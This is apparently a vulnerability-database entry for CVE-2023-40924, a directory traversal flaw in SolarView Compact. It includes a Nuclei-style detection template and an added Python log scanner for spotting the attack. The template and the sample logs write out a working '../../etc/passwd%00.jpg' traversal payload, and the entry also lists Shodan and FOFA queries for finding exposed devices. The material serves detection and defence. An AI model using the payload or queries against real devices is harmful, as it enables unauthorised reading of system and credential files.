SolarView Compact < 6.00 - Directory Traversal
CVE-2023-40924
Verified
Description
SolarView Compact before version 6.00 is vulnerable to directory traversal via the file parameter in downloader.php. An unauthenticated attacker can read arbitrary files from the system by using path traversal sequences with a null byte bypass to access sensitive files such as /etc/passwd.
Severity
High
CVSS Score
7.5
Exploit Probability
67%
Affected Product
solarview_compact_firmware
Published Date
April 6, 2026
Template Author
dhiyaneshdk
CVE-2023-40924.yaml
id: CVE-2023-40924
info:
  name: SolarView Compact < 6.00 - Directory Traversal
  author: DhiyaneshDk
  severity: high
  description: |
    SolarView Compact before version 6.00 is vulnerable to directory traversal via the file parameter in downloader.php. An unauthenticated attacker can read arbitrary files from the system by using path traversal sequences with a null byte bypass to access sensitive files such as /etc/passwd.
  impact: |
    An attacker can read sensitive system files including /etc/passwd which may contain password hashes on embedded devices, potentially leading to full system compromise.
  remediation: |
    Upgrade SolarView Compact to version 6.00 or later.
  reference:
    - https://github.com/Yobing1/CVE-2023-40924/blob/main/README.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40924
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-40924
    epss-score: 0.66586
    epss-percentile: 0.98559
    cwe-id: CWE-22
    cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: contec
    product: solarview_compact_firmware
    shodan-query:
      - http.html:"SolarView Compact"
      - http.favicon.hash:"-244067125"
      - http.html:"solarview compact"
    fofa-query:
      - body="solarview compact"
      - icon_hash="-244067125"
  tags: cve,cve2023,lfi,solarview,contec,traversal,vuln
http:
  - method: GET
    path:
      - "{{BaseURL}}/downloader.php?file=../../../../../../../../../../etc/passwd%00.jpg"
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
      - type: status
        status:
          - 200
# digest: 490a00463044022035c803441ddda4e987536635b817a0bff66797c1cfd0bf21f80ffb0df2519758022044820e5319f1a5d5d7580d837c768bdbce4952e50e5285f5c559f284d647c72d:922c64590222798bb761d5b6d8e72950
7.5 Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2023-40924
CWE ID:
cwe-22
Remediation Steps
Upgrade SolarView Compact to version 6.00 or later.
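For devices that cannot be upgraded immediately, web access logs can be reviewed for the request shape the template above sends. The following is an added example, not part of the template or of the vendor's software: it flags requests to downloader.php whose file parameter, after percent-decoding, contains a ".." path segment or a NUL byte. The combined log format, the sample lines, and the function names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /downloader.php?file=report_2023.csv HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /downloader.php?file=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 200 1203',
    '198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "GET /downloader.php?file=%252e%252e%252fetc%252fpasswd%2500.jpg HTTP/1.1" 404 0',
    '203.0.113.4 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?file=../x HTTP/1.1" 200 10',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e, %2500) is seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return a finding dict for a suspicious downloader.php request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    url = urlsplit(target)
    if not url.path.lower().endswith("/downloader.php"):
        return None
    reasons = set()
    for raw in parse_qs(url.query, keep_blank_values=True).get("file", []):
        value = fully_decode(raw)
        if ".." in re.split(r"[/\\]", value):  # a whole ".." path segment
            reasons.add("traversal")
        if "\x00" in value:  # NUL byte used to cut off an appended extension
            reasons.add("nul-byte")
    if not reasons:
        return None
    # Status 200 means the device served a response; prioritise those hits.
    return {"client": client, "status": int(status), "reasons": sorted(reasons)}

def scan(lines):
    """Classify every log line and keep only the findings."""
    return [finding for finding in map(classify, lines) if finding]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Findings with status 200 are the ones to triage first, since the template itself treats a 200 response with a matching body as confirmation.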